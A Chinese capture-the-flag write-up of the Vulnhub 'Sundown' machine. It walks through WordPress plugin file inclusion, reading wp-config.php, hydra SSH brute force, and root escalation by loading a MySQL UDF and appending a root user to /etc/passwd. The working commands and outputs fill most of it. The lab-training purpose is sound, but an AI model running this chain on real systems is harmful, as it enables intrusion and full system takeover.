Vulnhub Sundown靶机解题过程
Sundown
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:c9:80 1 60 PCS Systemtechnik GmbH
192.168.56.173 08:00:27:a9:1b:c1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.173
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.173 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 08:31 EST
Nmap scan report for bogon (192.168.56.173)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
| 256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
|_ 256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Sundown – Just another WordPress site
MAC Address: 08:00:27:A9:1B:C1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
目标主机有两个开放端口22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:30 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.173/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.173/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.173/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-with-spritz
| Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.173/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 08:37:33 2022
[+] Requests Done: 52
[+] Cached Requests: 8
[+] Data Sent: 13.283 KB
[+] Data Received: 361.348 KB
[+] Memory used: 235.969 MB
[+] Elapsed time: 00:00:03
发现了用户名admin,看能不能破解其密码:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:59 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.173/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.173/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.173/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-with-spritz
| Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
^CTrying admin / KEVIN1 Time: 00:04:47 < > (43280 / 14344392) 0.30% ETA: 26:21:^Cying admin / skittle1 Time: 00:04:49 < > (43645 / 14344392) 0.30% ETA: 26:20:43
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (43650 / 14344392) 0.30% ETA: 26:20:42
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 08:42:53 2022
[+] Requests Done: 43797
[+] Cached Requests: 39
[+] Data Sent: 22.229 MB
[+] Data Received: 25.742 MB
[+] Memory used: 257.387 MB
[+] Elapsed time: 00:04:54
Scan Aborted: Canceled by User
没有破解成功,但是注意到wpscan扫描出来一个插件wp-with-spritz
查找一下有无漏洞?
https://www.exploit-db.com/exploits/44544
1. Version Disclosure
/wp-content/plugins/wp-with-spritz/readme.txt
2. Source Code
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);
3. Proof of Concept
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
该插件存在文件包含漏洞:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
发现存在用户carlos,看有没有私钥
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/carlos/.ssh/id_rsam
没有收获,尝试ssh登录carlos
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.56.173 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-12 08:50:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.173:22/
[22][ssh] host: 192.168.56.173 login: carlos password: carlos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-12 08:51:08
利用hydra工具破解用户carlos的密码: carlos
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ ssh carlos@192.168.56.173
The authenticity of host '192.168.56.173 (192.168.56.173)' can't be established.
ED25519 key fingerprint is SHA256:LrAN6VcuvH1BM5LTmD54ngGS/pZZXNvsATpRvEIuwhg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.173' (ED25519) to the list of known hosts.
carlos@192.168.56.173's password:
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug 3 19:39:26 2020 from 192.168.100.139
carlos@sundown:~$ id
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
成功拿到了carlos的shell
提权
将linpeas.sh脚本上传至目标主机,修改权限,并执行
没有太大收获,有点值得注意,mysql竟然是草鸡用户
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
而且竟然无法读取wp-config.php
carlos@sundown:/var/www/html/wordpress$ ls -alh wp-config.php
-rw-r----- 1 www-data www-data 3.3K Aug 3 2020 wp-config.php
但事实上我们可以利用文件包含漏洞(前面读取/etc/passwd文件)读取该文件:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HTTP_BLOCK_EXTERNAL', true);
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'Ki6(+lcPzEIJZr++d}5b=k]ve+=qj+^iV#4=-@Ir>N7]`am^ir-?h*rgL*O1=eW|');
define('SECURE_AUTH_KEY', 'F{1rBAEK#q_QUSGUJ`PkH}N%&m27mE8=5xc+P$n`3g9#]X59#!pkE(Kz-OGa!CzU');
define('LOGGED_IN_KEY', 'e.s%#mQ$#MMrKG3jf@6jAx[d}A7rODFO&|Y1|@->3KShCg<z }o5M*:j#1G2Am9;');
define('NONCE_KEY', '$|Vq+u:J-+GY^0&zk2.JNp}-/rjCyyEjeZ/:UdqHM?INN*,V|-*yp1@IYjc8<MYI');
define('AUTH_SALT', 'Oa2[X]i$+>XTA?j|1EDScmJ_4jXA),J5t0[B8uhcI- vhbXELvF?bR:Mszjgx1gS');
define('SECURE_AUTH_SALT', 'F9A.5/`YNxdr3<PMz0[Vj`-aL`vUQ <pT$JF(KZ2,c7IJ)cEL+SgFYbvf]KQO|F+');
define('LOGGED_IN_SALT', 'W4H:NhcaynZCD-1}/1.N&O4t<oO-YKbkqPgIk_Zi#$>;ANIvjLA}=]6QG:Sr#J1=');
define('NONCE_SALT', '7GU.TppPZCBb,Aebxjb9*$cP/x *3&iSN$`?f&L(*%cI7}LfBGyBz=A^[QxuW;tB');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
这里有数据库的用户名(root)和密码,但这是也是系统的root密码呢?结果是失败的,但是可以进入到数据库看一下
从网上下载lib_mysqludf_sys_64.so文件,将该文件上传到目标站点
carlos@sundown:/var/www/html/wordpress$ cd /tmp
carlos@sundown:/tmp$ curl http://192.168.56.137:8000/lib_mysqludf_sys_64.so -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8040 100 8040 0 0 713k 0 --:--:-- --:--:-- --:--:-- 713k
carlos@sundown:/tmp$ ls
lib_mysqludf_sys_64.so linpeas.sh systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-apache2.service-TfZ0pc systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-systemd-timesyncd.service-XFeS9G
carlos@sundown:/var/www/html/wordpress$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 69132
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress_db |
+--------------------+
4 rows in set (0.002 sec)
MariaDB [(none)]>
MariaDB [(none)]> quit
Bye
carlos@sundown:/var/www/html/wordpress$ cd /tmp
carlos@sundown:/tmp$ curl http://192.168.56.137:8000/lib_mysqludf_sys_64.so -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8040 100 8040 0 0 713k 0 --:--:-- --:--:-- --:--:-- 713k
carlos@sundown:/tmp$ ls
lib_mysqludf_sys_64.so linpeas.sh systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-apache2.service-TfZ0pc systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-systemd-timesyncd.service-XFeS9G
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 69133
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> create table potato(line blob);
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.014 sec)
MariaDB [mysql]> insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
ERROR 1054 (42S22): Unknown column '‘' in 'field list'
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)
MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.000 sec)
MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)
MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.000 sec)
MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd');
+---------------------------------------------------------------------------------------------+
| sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd') |
+---------------------------------------------------------------------------------------------+
| 0 |
+---------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
carlos@sundown:/tmp$ su - Dave
su: user Dave does not exist
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 69134
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+-----------------------------------------------------------------------------------------+
| sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+-----------------------------------------------------------------------------------------+
| 0 |
+-----------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
